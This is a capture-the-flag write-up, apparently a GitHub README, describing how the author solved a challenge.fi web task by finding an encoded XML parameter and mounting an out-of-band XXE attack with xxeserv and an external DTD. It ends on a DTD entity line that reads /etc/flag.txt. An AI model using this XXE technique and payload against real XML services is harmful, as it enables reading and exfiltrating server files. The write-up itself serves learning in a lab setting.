H-mmer/CTF-Writeups/challenge.fi/README.md

 This one was actually very difficult, no hints whatsoever.
 No indication where to begin except the website.
 Took me over 2 days to figure this one out, but I'll try to keep it short.
 First I started by going to the website annd we get greeted with this:
 ![spongebob](./web/spongebob.png)

 So I figure i'd check the source using `view-source:` and we got this!

 ![debug](./web/debug.png)

 Alright!
 We got something, looks like the site has xml.php with xml parameter.
 The string looks like its URL Encoded and Base64 encoded so lets use [CyberChef](https://gchq.github.io/CyberChef/) to decode it.
-We got this:

 ![decoded](./web/decoded.png)

 Alright so we're dealing with actual XML and I figured we're most likely going to do some sort of XXE attack (XML External Entity) here.
 So I start googling about XXE attacks and I tried a few (read: A LOT) different ways but I never seemed to get any other response from the server than `Username or password not found!
 Try Harder!`.
 Then after a while of banging my head against the table I stumbled upon [THIS](https://medium.com/@jonathanbouman/xxe-at-bol-com-7d331186de54) a brilliant bugbounty write up by Jonathan Bouman.
 He was using [xxeserv](https://github.com/staaldraad/xxeserv) along with external DTD file on a public facing server.
 So that's exactly what I did.
 I installed xxeserv and copied his sp2.dtd
 ```
 <!ENTITY % d SYSTEM "file:///etc/flag.txt">